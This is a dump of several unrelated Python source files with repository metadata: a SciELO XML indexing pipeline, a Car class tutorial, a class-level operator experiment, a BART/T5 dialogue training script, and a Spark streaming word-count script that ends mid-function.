964d0631249c05ccd8a57becf125da4429dca45e | 3dfbd430ef10352acd4a4cfbeb51c01e78ad0dd1 | /updatesearch/pipeline_xml.py | 20b05fae0c8e62b7e8d8a4d81c2730aedf8e3432 | [
"BSD-2-Clause"
] | permissive | DalavanCloud/search-journals-proc | f09c7e29ede35e6756ccee5f20fabec9c1676224 | a246688ffd213c6ff814c290ea2190f7de358def | refs/heads/master | 2020-04-29T06:44:04.593174 | 2017-11-09T19:30:37 | 2017-11-09T19:30:37 | 175,927,206 | 1 | 0 | null | 2019-03-16T04:44:47 | 2019-03-16T04:44:47 | null | UTF-8 | Python | false | false | 19,924 | py | # coding: utf-8
from lxml import etree as ET
import plumber
from citedby import client
CITEDBY = client.ThriftClient(domain='citedby.scielo.org:11610')
"""
Full example output of this pipeline:
<doc>
<field name="id">art-S0102-695X2015000100053-scl</field>
<field name="journal_title">Revista Ambiente & Água</field>
<field name="in">scl</field>
<field name="ac">Agricultural Sciences</field>
<field name="type">editorial</field>
<field name="ur">art-S1980-993X2015000200234</field>
<field name="authors">Marcelo dos Santos, Targa</field>
<field name="orcidid">orcidid</field>
<field name="lattesid">lattesid</field>
<field name="ti_*">Benefits and legacy of the water crisis in Brazil</field>
<field name="pg">234-239</field>
<field name="doi">10.1590/S0102-67202014000200011</field>
<field name="wok_citation_index">SCIE</field>
<field name="volume">48</field>
<field name="supplement_volume">48</field>
<field name="issue">7</field>
<field name="supplement_issue">suppl. 2</field>
<field name="start_page">216</field>
<field name="end_page">218</field>
<field name="ta">Rev. Ambient. Água</field>
<field name="la">en</field>
<field name="fulltext_pdf_pt">http://www.scielo.br/pdf/ambiagua/v10n2/1980-993X-ambiagua-10-02-00234.pdf</field>
<field name="fulltext_pdf_pt">http://www.scielo.br/scielo.php?script=sci_abstract&pid=S0102-67202014000200138&lng=en&nrm=iso&tlng=pt</field>
<field name="da">2015-06</field>
<field name="ab_*">In this editorial, we reflect on the benefits and legacy of the water crisis....</field>
<field name="aff_country">Brasil</field>
<field name="aff_institution">usp</field>
<field name="sponsor">CNPQ</field>
</doc>
"""
CITABLE_DOCUMENT_TYPES = (
u'article-commentary',
u'brief-report',
u'case-report',
u'rapid-communication',
u'research-article',
u'review-article'
)
class SetupDocument(plumber.Pipe):
    """First pipe: wrap the raw article with an empty <doc> XML root."""
    def transform(self, data):
        xml = ET.Element('doc')
        return data, xml
class SubjectAreas(plumber.Pipe):
    """Add a 'subject_area' field per journal area.

    Journals with more than two areas are indexed as 'multidisciplinary'.
    """
    def precond(data):
        raw, xml = data
        if not raw.journal.subject_areas:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        if len(raw.journal.subject_areas) > 2:
            field = ET.Element('field')
            field.text = 'multidisciplinary'
            field.set('name', 'subject_area')
            xml.find('.').append(field)
            return data
        for subject_area in raw.journal.subject_areas:
            field = ET.Element('field')
            field.text = subject_area
            field.set('name', 'subject_area')
            xml.find('.').append(field)
        return data
class Keywords(plumber.Pipe):
    """Add a language-suffixed 'keyword_<lang>' field per article keyword."""
    def precond(data):
        raw, xml = data
        if not raw.keywords():
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        for language, keywords in raw.keywords().items():
            for keyword in keywords:
                field = ET.Element('field')
                field.text = keyword
                field.set('name', 'keyword_%s' % language)
                xml.find('.').append(field)
        return data
class IsCitable(plumber.Pipe):
    """Flag whether the document type counts as citable (see CITABLE_DOCUMENT_TYPES)."""
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = 'is_true' if raw.document_type in CITABLE_DOCUMENT_TYPES else 'is_false'
        field.set('name', 'is_citable')
        xml.find('.').append(field)
        return data
class JournalISSNs(plumber.Pipe):
    """Add one 'issn' field per distinct journal ISSN (electronic/print/scielo)."""
    def transform(self, data):
        raw, xml = data
        issns = set()
        # NOTE(review): the guards test raw.electronic_issn / raw.print_issn but
        # the values added come from raw.journal.* — confirm whether the guards
        # were meant to read raw.journal.electronic_issn / raw.journal.print_issn.
        if raw.electronic_issn:
            issns.add(raw.journal.electronic_issn)
        if raw.print_issn:
            issns.add(raw.journal.print_issn)
        issns.add(raw.journal.scielo_issn)
        for issn in issns:
            field = ET.Element('field')
            field.text = issn
            field.set('name', 'issn')
            xml.find('.').append(field)
        return data
class DocumentID(plumber.Pipe):
    """Add the unique 'id' field: '<publisher_id>-<collection_acronym>'."""
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = '{0}-{1}'.format(raw.publisher_id, raw.collection_acronym)
        field.set('name', 'id')
        xml.find('.').append(field)
        return data
class JournalTitle(plumber.Pipe):
    """Add the 'journal_title' field from the journal record."""
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.journal.title
        field.set('name', 'journal_title')
        xml.find('.').append(field)
        return data
# NOTE(review): this is a byte-for-byte duplicate of the JournalTitle class
# defined immediately above; it shadows the identical definition and is safe
# to delete.
class JournalTitle(plumber.Pipe):
    """Add the 'journal_title' field from the journal record (duplicate definition)."""
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.journal.title
        field.set('name', 'journal_title')
        xml.find('.').append(field)
        return data
class Permission(plumber.Pipe):
    """Add license fields: 'use_license' id, plus optional text and URI."""
    def precond(data):
        raw, xml = data
        if not raw.permissions:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.permissions.get('id', '')
        field.set('name', 'use_license')
        # Appending to xml directly is equivalent to xml.find('.').append used
        # by the other pipes (find('.') returns the element itself).
        xml.append(field)
        if raw.permissions.get('text', None):
            field = ET.Element('field')
            field.text = raw.permissions.get('text', '')
            field.set('name', 'use_license_text')
            xml.append(field)
        if raw.permissions.get('url', None):
            field = ET.Element('field')
            field.text = raw.permissions.get('url', '')
            field.set('name', 'use_license_uri')
            xml.append(field)
        return data
class Collection(plumber.Pipe):
    """Add the 'in' field holding the collection acronym."""
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.collection_acronym
        field.set('name', 'in')
        xml.find('.').append(field)
        return data
class DocumentType(plumber.Pipe):
    """Add the 'type' field holding the document type."""
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.document_type
        field.set('name', 'type')
        xml.find('.').append(field)
        return data
class URL(plumber.Pipe):
    """Add the 'ur' field holding the publisher id (document locator)."""
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = '{0}'.format(raw.publisher_id)
        field.set('name', 'ur')
        xml.find('.').append(field)
        return data
class Authors(plumber.Pipe):
    """Add one 'au' field per author as 'Surname, Given Names'."""
    def precond(data):
        raw, xml = data
        if not raw.authors:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        for author in raw.authors:
            field = ET.Element('field')
            name = []
            if 'surname' in author:
                name.append(author['surname'])
            if 'given_names' in author:
                name.append(author['given_names'])
            field.text = ', '.join(name)
            field.set('name', 'au')
            xml.find('.').append(field)
        return data
class Orcid(plumber.Pipe):
    """Add one 'orcid' field per author that carries an ORCID identifier."""
    def precond(data):
        raw, xml = data
        if not raw.authors:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        for orcid in [i['orcid'] for i in raw.authors if i.get('orcid', None)]:
            field = ET.Element('field')
            field.text = orcid
            field.set('name', 'orcid')
            xml.find('.').append(field)
        return data
class OriginalTitle(plumber.Pipe):
    """Add the 'ti' field holding the article's original-language title."""
    def precond(data):
        raw, xml = data
        if not raw.original_title():
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.original_title()
        field.set('name', 'ti')
        xml.find('.').append(field)
        return data
class Titles(plumber.Pipe):
    """Add language-suffixed 'ti_<lang>' fields for original and translated titles."""
    def precond(data):
        raw, xml = data
        if not raw.original_title() and not raw.translated_titles():
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.original_title()
        field.set('name', 'ti_%s' % raw.original_language())
        xml.find('.').append(field)
        if not raw.translated_titles():
            return data
        for language, title in raw.translated_titles().items():
            field = ET.Element('field')
            field.text = title
            field.set('name', 'ti_%s' % language)
            xml.find('.').append(field)
        return data
class Pages(plumber.Pipe):
    """Add the 'pg' field as 'start-end' (either part optional)."""
    def precond(data):
        raw, xml = data
        if not raw.start_page and not raw.end_page:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        pages = []
        if raw.start_page:
            pages.append(raw.start_page)
        if raw.end_page:
            pages.append(raw.end_page)
        field = ET.Element('field')
        field.text = '-'.join(pages)
        field.set('name', 'pg')
        xml.find('.').append(field)
        return data
class DOI(plumber.Pipe):
    """Add the 'doi' field when the article has a DOI."""
    def precond(data):
        raw, xml = data
        if not raw.doi:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.doi
        field.set('name', 'doi')
        xml.find('.').append(field)
        return data
class WOKCI(plumber.Pipe):
    """Add one 'wok_citation_index' field per Web of Science citation index."""
    def precond(data):
        raw, xml = data
        if not raw.journal.wos_citation_indexes:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        for index in raw.journal.wos_citation_indexes:
            # '&' stripped to keep the index name a clean facet value.
            field = ET.Element('field')
            field.text = index.replace('&', '')
            field.set('name', 'wok_citation_index')
            xml.find('.').append(field)
        return data
class WOKSC(plumber.Pipe):
    """Add one 'wok_subject_categories' field per Web of Science subject area."""
    def precond(data):
        raw, xml = data
        if not raw.journal.wos_subject_areas:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        for index in raw.journal.wos_subject_areas:
            field = ET.Element('field')
            field.text = index
            field.set('name', 'wok_subject_categories')
            xml.find('.').append(field)
        return data
class Volume(plumber.Pipe):
    """Add the 'volume' field when the issue declares a volume."""
    def transform(self, data):
        raw, xml = data
        if raw.issue.volume:
            field = ET.Element('field')
            field.text = raw.issue.volume
            field.set('name', 'volume')
            xml.find('.').append(field)
        return data
class SupplementVolume(plumber.Pipe):
    """Add the 'supplement_volume' field when present on the issue."""
    def transform(self, data):
        raw, xml = data
        if raw.issue.supplement_volume:
            field = ET.Element('field')
            field.text = raw.issue.supplement_volume
            field.set('name', 'supplement_volume')
            xml.find('.').append(field)
        return data
class Issue(plumber.Pipe):
    """Add the 'issue' field when the issue declares a number."""
    def transform(self, data):
        raw, xml = data
        if raw.issue.number:
            field = ET.Element('field')
            field.text = raw.issue.number
            field.set('name', 'issue')
            xml.find('.').append(field)
        return data
class SupplementIssue(plumber.Pipe):
    """Add the 'supplement_issue' field when present on the issue."""
    def transform(self, data):
        raw, xml = data
        if raw.issue.supplement_number:
            field = ET.Element('field')
            field.text = raw.issue.supplement_number
            field.set('name', 'supplement_issue')
            xml.find('.').append(field)
        return data
class ElocationPage(plumber.Pipe):
    """Add the 'elocation' field when the article has an elocation id."""
    def precond(data):
        raw, xml = data
        if not raw.elocation:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.elocation
        field.set('name', 'elocation')
        xml.find('.').append(field)
        return data
class StartPage(plumber.Pipe):
    """Add the 'start_page' field when present."""
    def precond(data):
        raw, xml = data
        if not raw.start_page:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.start_page
        field.set('name', 'start_page')
        xml.find('.').append(field)
        return data
class EndPage(plumber.Pipe):
    """Add the 'end_page' field when present."""
    def precond(data):
        raw, xml = data
        if not raw.end_page:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.end_page
        field.set('name', 'end_page')
        xml.find('.').append(field)
        return data
class JournalAbbrevTitle(plumber.Pipe):
    """Add the 'ta' field holding the journal's abbreviated title."""
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.journal.abbreviated_title
        field.set('name', 'ta')
        xml.find('.').append(field)
        return data
class Languages(plumber.Pipe):
    """Add one 'la' field per language (fulltext languages + original language)."""
    def transform(self, data):
        raw, xml = data
        langs = set([i for i in raw.languages()])
        langs.add(raw.original_language())
        for language in langs:
            field = ET.Element('field')
            field.text = language
            field.set('name', 'la')
            xml.find('.').append(field)
        return data
class AvailableLanguages(plumber.Pipe):
    """Add 'available_languages' fields: fulltexts + original + translated abstracts."""
    def transform(self, data):
        raw, xml = data
        langs = set([i for i in raw.languages()])
        langs.add(raw.original_language())
        if raw.translated_abstracts():
            for lang in raw.translated_abstracts().keys():
                langs.add(lang)
        for language in langs:
            field = ET.Element('field')
            field.text = language
            field.set('name', 'available_languages')
            xml.find('.').append(field)
        return data
class Fulltexts(plumber.Pipe):
    """Add 'fulltext_pdf_<lang>' / 'fulltext_html_<lang>' URL fields."""
    def precond(data):
        raw, xml = data
        if not raw.fulltexts():
            raise plumber.UnmetPrecondition()

    # FIX: the precondition decorator was missing, leaving precond() as dead
    # code — every other pipe in this module applies it. With the decorator,
    # an article without fulltexts is passed through untouched (the same net
    # result the undecorated transform produced, but consistent with the
    # module's pattern).
    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        ft = raw.fulltexts()
        # There is articles that does not have pdf
        if 'pdf' in ft:
            for language, url in ft['pdf'].items():
                field = ET.Element('field')
                field.text = url
                field.set('name', 'fulltext_pdf_%s' % language)
                xml.find('.').append(field)
        if 'html' in ft:
            for language, url in ft['html'].items():
                field = ET.Element('field')
                field.text = url
                field.set('name', 'fulltext_html_%s' % language)
                xml.find('.').append(field)
        return data
class PublicationDate(plumber.Pipe):
    """Add the 'da' field holding the article's publication date."""
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.publication_date
        field.set('name', 'da')
        xml.find('.').append(field)
        return data
class SciELOPublicationDate(plumber.Pipe):
    """Add 'scielo_publication_date' from the record's creation date."""
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.creation_date
        field.set('name', 'scielo_publication_date')
        xml.find('.').append(field)
        return data
class ReceivedCitations(plumber.Pipe):
    """Add 'total_received' by querying the remote citedby service.

    NOTE: performs a network call (Thrift) per document; defaults to 0
    when the service returns no article entry.
    """
    def transform(self, data):
        raw, xml = data
        result = CITEDBY.citedby_pid(raw.publisher_id, metaonly=True)
        field = ET.Element('field')
        field.text = str(result.get('article', {'total_received': 0})['total_received'])
        field.set('name', 'total_received')
        xml.find('.').append(field)
        return data
class SciELOProcessingDate(plumber.Pipe):
    """Add 'scielo_processing_date' from the record's processing date."""
    def transform(self, data):
        raw, xml = data
        field = ET.Element('field')
        field.text = raw.processing_date
        field.set('name', 'scielo_processing_date')
        xml.find('.').append(field)
        return data
class Abstract(plumber.Pipe):
    """Add language-suffixed 'ab_<lang>' fields for original and translated abstracts."""
    def precond(data):
        raw, xml = data
        if not raw.original_abstract() and not raw.translated_abstracts():
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        if raw.original_abstract():
            field = ET.Element('field')
            field.text = raw.original_abstract()
            field.set('name', 'ab_%s' % raw.original_language())
            xml.find('.').append(field)
        if not raw.translated_abstracts():
            return data
        for language, abstract in raw.translated_abstracts().items():
            field = ET.Element('field')
            field.text = abstract
            field.set('name', 'ab_%s' % language)
            xml.find('.').append(field)
        return data
class AffiliationCountry(plumber.Pipe):
    """Add one 'aff_country' field per distinct affiliation country."""
    def precond(data):
        raw, xml = data
        if not raw.mixed_affiliations:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        # Deduplicate before emitting fields.
        countries = set()
        for affiliation in raw.mixed_affiliations:
            if 'country' in affiliation:
                countries.add(affiliation['country'])
        for country in countries:
            field = ET.Element('field')
            field.text = country.strip()
            field.set('name', 'aff_country')
            xml.find('.').append(field)
        return data
class AffiliationInstitution(plumber.Pipe):
    """Add one 'aff_institution' field per distinct affiliation institution."""
    def precond(data):
        raw, xml = data
        if not raw.mixed_affiliations:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        # Deduplicate before emitting fields.
        institutions = set()
        for affiliation in raw.mixed_affiliations:
            if 'institution' in affiliation:
                institutions.add(affiliation['institution'])
        for institution in institutions:
            field = ET.Element('field')
            field.text = institution.strip()
            field.set('name', 'aff_institution')
            xml.find('.').append(field)
        return data
class Sponsor(plumber.Pipe):
    """Add one 'sponsor' field per distinct project sponsor organization."""
    def precond(data):
        raw, xml = data
        if not raw.project_sponsor:
            raise plumber.UnmetPrecondition()

    @plumber.precondition(precond)
    def transform(self, data):
        raw, xml = data
        # Deduplicate before emitting fields.
        sponsors = set()
        for sponsor in raw.project_sponsor:
            if 'orgname' in sponsor:
                sponsors.add(sponsor['orgname'])
        for sponsor in sponsors:
            field = ET.Element('field')
            field.text = sponsor
            field.set('name', 'sponsor')
            xml.find('.').append(field)
        return data
class TearDown(plumber.Pipe):
    """Last pipe: discard the raw article and return only the built XML doc."""
    def transform(self, data):
        raw, xml = data
        return xml
| [
"fabiobatalha@gmail.com"
] | fabiobatalha@gmail.com |
616481b2e75063bd42b700b4baac1bdbbd6f92b1 | 1804187f39dd6004250933b35ba9ce24297f32a5 | /car_importclass.py | 860b39b3d9c08872ea8be65c07d26f6029ef9c66 | [] | no_license | xiaomengxiangjia/Python | ecd2e3e8576364f15482669cb75b52b8790543f5 | 7f52a33d7956068d26347cf34d35c953b945a635 | refs/heads/master | 2020-03-20T23:01:09.981928 | 2018-08-23T09:04:53 | 2018-08-27T05:46:38 | 137,825,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,242 | py | """一个可用于表示汽车的类"""
class Car():
    """A simple model of a car."""

    def __init__(self, make, model, year):
        """Store the car's descriptive attributes and zero the odometer."""
        self.make = make
        self.model = model
        self.year = year
        self.odometer_reading = 0

    def get_descriptive_name(self):
        """Return a neatly formatted descriptive name."""
        return f"{self.year} {self.make} {self.model}".title()

    def read_odometer(self):
        """Print a message stating the car's mileage."""
        print(f"This car has {self.odometer_reading} miles on it.")

    def update_odometer(self, mileage):
        """Set the odometer to *mileage*, refusing to roll it back."""
        if mileage < self.odometer_reading:
            print("You can't roll back an odometer!")
        else:
            self.odometer_reading = mileage

    def increment_odometer(self, miles):
        """Add *miles* to the odometer reading."""
        self.odometer_reading += miles
"""一组用于表示电动汽车的类"""
class Battery():
    """A simple model of an electric-car battery."""

    def __init__(self, battery_size=60):
        """Record the battery capacity in kWh (defaults to 60)."""
        self.battery_size = battery_size

    def describe_battery(self):
        """Print a message describing the battery capacity."""
        print(f"This car has a {self.battery_size}-kwh battery.")

    def get_range(self):
        """Print the approximate range this battery provides."""
        known_ranges = {70: 240, 85: 270}
        miles = known_ranges.get(self.battery_size, 200)
        print(f"This car can go approximately {miles} miles on a full charge.")
class ElectricCar(Car):
    """Models aspects specific to electric cars."""
    def __init__(self, make, model, year):
        """
        Initialize the parent class's attributes, then the attributes
        specific to an electric car (a default Battery instance).
        """
        super().__init__(make, model, year)
        self.battery = Battery()
| [
"645334483@qq.com"
] | 645334483@qq.com |
276bccd4f16fb7b435ac61d0da296658d2a152fd | 97ae427ff84c9b0450ed709dc55e1cc0e1edc096 | /til/future_til/class_level_operators.py | 02723ea43b703bfd62523ad8737ad110b21d2a4e | [] | no_license | OaklandPeters/til | 9081ac8b968223f4c92b38cf20cda90c92966628 | 12a1f7623916709211686d7817b93c7ef4d532d2 | refs/heads/master | 2021-01-17T14:16:48.285244 | 2016-06-20T14:23:40 | 2016-06-20T14:23:40 | 51,449,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,586 | py | """
This has not been made into a TIL in til/python yet, because...
it does not work correctly atm.
However, I'm reasonably sure I can get it to work (since I've got type-level operatores to work in the past)
"""
#
# Class-level operators
#--------------------------
# Requires metaclasses
# To make this work with instance-level overrides is complicated
# ... I should look to the proper method lookup, as described here:
# https://blog.ionelmc.ro/2015/02/09/understanding-python-metaclasses/
#
# ... actually, I'm pretty sure I need to use something like my @pedanticmethod
# to make __mul__ work as both a classmethod and instancemethod
class OperatorMeta(type):
    # Metaclass that makes `SomeClass * other` dispatch to the class's own
    # __mul__ (an experiment in class-level operators; see module notes above).
    def __mul__(cls, other):
        # NOTE(review): for the intended usage (ThreeBase below defines
        # __mul__) hasattr() is always True, so the else branch never runs.
        if hasattr(cls, '__mul__'):
            return cls.__mul__(other)
        else:
            return type.__mul__(cls, other)
        # Dead code: both branches above already returned, so this raise is
        # unreachable (kept as-is — this file documents the experiment).
        raise TypeError(str.format(
            "unspported operand type(s) for *: '{0}' and '{1}'",
            cls.__name__, type(other).__name__
        ))
class ThreeBase(metaclass=OperatorMeta):
    # Class-level multiplicand; instances shadow it via __init__, but see the
    # note below — the classmethod __mul__ always reads the class attribute.
    base = 3
    @classmethod
    def __mul__(cls, value):
        # Bound to the class, so `instance * x` still uses cls.base, never
        # the instance's own `base` (this is the bug the module describes).
        return cls.base * value
    def __init__(self, base):
        self.base = base
# Demonstration: class-level `*` works as intended...
assert((ThreeBase * 5) == 15)
# NOTE(review): ...but this second assert FAILS at import time — Python looks
# special methods up on the type, so the instance's `base` is never used.
assert((ThreeBase(10) * 5) == 50 ) # WRONG. Still returns 15
# This does not work correctly, the problem being I forget how
# to make OperatorMeta.__mul__ proxy down to the instance level
# ... HOWEVER, if I look up the standard rules for method lookup,
# in relation to metaclasses (the standard metaclass being 'type')
# then that should show me what to do
| [
"oakland.peters@gmail.com"
] | oakland.peters@gmail.com |
c3183a64b60f82a2d1f1c7b82e11741403c960e7 | 64c9d1c676456da745d953b0f93b12b8c9478801 | /train_bart.py | ed9f8a0d3e86b748e3e4875d33cdfab99b927aa7 | [] | no_license | sen33/end-to-end-dialogue-system | 530508a18e9bee4a96f122e5cc48f4172d665175 | ddc88a9467093a014eadd28826e14a5afcbdda75 | refs/heads/master | 2023-05-12T23:41:13.151164 | 2021-06-04T08:30:51 | 2021-06-04T08:30:51 | 373,682,115 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,212 | py | from argparse import ArgumentParser
from tqdm import tqdm
from datasets import load_dataset, load_metric
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM, DataCollatorForSeq2Seq, Seq2SeqTrainingArguments, Seq2SeqTrainer
import numpy as np
def preprocess_function(examples):
    """Tokenize a batch of source/target pairs for seq2seq training.

    Uses the module-level `tokenizer`, `prefix` and parsed CLI `args`.
    Previously the input length was hard-coded to 1024 and targets were
    never truncated, silently ignoring the --max_input_length and
    --max_target_length command-line options.
    """
    inputs = [prefix + ex for ex in examples['source']]
    targets = [ex for ex in examples['target']]
    model_inputs = tokenizer(inputs, max_length=args.max_input_length,
                             truncation=True)
    # Setup the tokenizer for targets
    with tokenizer.as_target_tokenizer():
        labels = tokenizer(targets, max_length=args.max_target_length,
                           truncation=True)
    model_inputs["labels"] = labels["input_ids"]
    return model_inputs
def postprocess_text(preds, labels):
    """Strip whitespace from predictions and wrap each reference label in a
    one-element list, the format sacrebleu expects."""
    cleaned_preds = list(map(str.strip, preds))
    wrapped_labels = [[ref.strip()] for ref in labels]
    return cleaned_preds, wrapped_labels
def compute_metrics(eval_preds):
    """Decode model predictions and labels, then report corpus BLEU and the
    mean generated length, both rounded to 4 decimals."""
    preds, labels = eval_preds
    if isinstance(preds, tuple):
        preds = preds[0]
    decoded_preds = tokenizer.batch_decode(preds, skip_special_tokens=True)
    # -100 marks ignored label positions; swap in the pad id so they decode.
    labels = np.where(labels != -100, labels, tokenizer.pad_token_id)
    decoded_labels = tokenizer.batch_decode(labels, skip_special_tokens=True)
    decoded_preds, decoded_labels = postprocess_text(decoded_preds, decoded_labels)
    bleu = metric.compute(predictions=decoded_preds, references=decoded_labels)
    gen_lens = [np.count_nonzero(p != tokenizer.pad_token_id) for p in preds]
    result = {"bleu": bleu["score"], "gen_len": np.mean(gen_lens)}
    return {key: round(value, 4) for key, value in result.items()}
# --- CLI configuration -------------------------------------------------------
parser = ArgumentParser(description='Generate result in certain format.')
parser.add_argument("--model_checkpoint", type=str, help="Checkpoint name or directory", default = 'facebook/bart-base')
parser.add_argument("--batch_size", type=int, help="Batch size", default = 8)
parser.add_argument("--learning_rate", type=float, help="Learing rate", default = 1e-5)
parser.add_argument("--epoch", type=int, help="Epoch", default = 10)
parser.add_argument("--output_dir", type=str, help="Output directory", default = 'run/bart/0')
parser.add_argument("--type", type=str, help="Data type", default = '')
parser.add_argument("--max_input_length", type=int, help="Max input length", default = 512)
parser.add_argument("--max_target_length", type=int, help="Max target length", default = 128)
args = parser.parse_args()
# Load train/test/validation splits from the JSON files for the chosen data type.
raw_datasets = load_dataset('json', data_files={
    'train': 'data/' + args.type + '/combined-train.json',
    'test': 'data/' + args.type + '/combined-test.json',
    'validation': 'data/' + args.type + '/combined-dev.json',
}, field = 'data')
metric = load_metric("sacrebleu")
tokenizer = AutoTokenizer.from_pretrained(args.model_checkpoint)
model = AutoModelForSeq2SeqLM.from_pretrained(args.model_checkpoint)
# Dialogue role markers; the knowledge-base variant adds a <dta> token.
if args.type == 'with-kb':
    ATTR_TO_SPECIAL_TOKEN = {'additional_special_tokens': ['<usr>', '<sys>', '<dta>']}
else:
    ATTR_TO_SPECIAL_TOKEN = {'additional_special_tokens': ['<usr>', '<sys>']}
tokenizer.add_special_tokens(ATTR_TO_SPECIAL_TOKEN)
# Embedding matrix must grow to cover the newly added special tokens.
model.resize_token_embeddings(len(tokenizer))
# T5-family checkpoints expect a task prefix; BART does not.
# NOTE(review): "t5-larg" looks like a typo for "t5-large" — that checkpoint
# would silently get an empty prefix; confirm against intended usage.
if args.model_checkpoint in ["t5-small", "t5-base", "t5-larg", "t5-3b", "t5-11b"]:
    prefix = "answer camrest question: "
else:
    prefix = ""
print('PREFIX: ' + prefix)
tokenized_datasets = raw_datasets.map(preprocess_function, batched=True)
trainingArgs = Seq2SeqTrainingArguments(
    output_dir=args.output_dir,
    evaluation_strategy = "epoch",
    learning_rate=args.learning_rate,
    per_device_train_batch_size=args.batch_size,
    per_device_eval_batch_size=args.batch_size,
    weight_decay=0.01,
    save_total_limit=1,
    num_train_epochs=args.epoch,
    predict_with_generate=True,
    load_best_model_at_end=True,
    metric_for_best_model='bleu',
)
data_collator = DataCollatorForSeq2Seq(tokenizer, model=model)
trainer = Seq2SeqTrainer(
    model,
    trainingArgs,
    train_dataset=tokenized_datasets["train"],
    eval_dataset=tokenized_datasets["validation"],
    data_collator=data_collator,
    tokenizer=tokenizer,
    compute_metrics=compute_metrics,
)
trainer.train()
| [
"vinsen@xendit.co"
] | vinsen@xendit.co |
64ccd8c888140a26f57b18329d4f4f830cabc223 | 3c38bd0b7e22b2a579cfb7433ee908cb034ea298 | /fpo_mgmt/fpo_management/doctype/fpo_village/test_fpo_village.py | 8f037419b73d63a63b352567182c713ccbc8c22f | [
"MIT"
] | permissive | csaindia/fpo_erpnext | 97d2b1d6012a61df779298a5c3f2f314b3fe749e | bc92a4d8b63a57c50a84878ebe7ff37227c367eb | refs/heads/master | 2021-04-27T06:22:44.556058 | 2018-03-27T06:51:37 | 2018-03-27T06:51:37 | 122,613,121 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2018, Center for Sustainable Agriculture and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestFPOVillage(unittest.TestCase):
    """Placeholder test case for the FPO Village doctype; no tests yet."""
| [
"sudhir.kothagunda@gmail.com"
] | sudhir.kothagunda@gmail.com |
9ec34fa7afffa2f1b30d4bc26ab78e65a475b4d9 | b156ae74bd7807369b931634eb4eac9849d75853 | /socketlis.py | 087ec998ad02c7492138c7627ae48d46bd52373c | [] | no_license | J0N35/Spark-Practice | 1864dac14b5f32cd3d281f2827c76f6e0e66bfce | 290681cbdcd4c84fed88cfdd6635767b7d238f4a | refs/heads/master | 2022-11-06T14:36:23.708782 | 2022-05-19T18:11:05 | 2022-05-19T18:11:05 | 59,737,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,566 | py |
# coding: utf-8
# In[ ]:
# example of spark stream
from pyspark import SparkContext, SparkConf
from pyspark.streaming import StreamingContext, StreamingListener
# initialize spark config
conf = SparkConf().setMaster('local[*]').setAppName('TweetCount')
# initialize spark context
sc = SparkContext(conf = conf)
# initialize sparkcontext object with batchDuration 60 seconds
# NOTE(review): the comment above says 60 seconds, but batchDuration is 10.
ssc = StreamingContext(sparkContext = sc, batchDuration = 10)
# initialize DStream(textFileStream) for streaming
lines = ssc.socketTextStream('localhost',6666)
# Some work with DStream
# Split each line into words
# words = lines.flatMap(lambda line: line.split(" "))
# Count each word in each batch
# pairs = words.map(lambda word: (word, 1))
pairs = lines.map(lambda line: (line, 1))
wordCounts = pairs.reduceByKey(lambda x, y: x + y)
# Print the first ten elements of each RDD generated in this DStream to the console
wordCounts.pprint(num = 10) # debug use
# Test begin
# wordsCounts.saveToMongoDB('mongodb://192.168.11.201:32823/country')
def function(entry):
    # Per-batch sink: upsert each (country, count) pair into MongoDB,
    # incrementing the stored count. Import is function-local so pymongo is
    # only needed on the driver when batches actually run.
    from pymongo import MongoClient
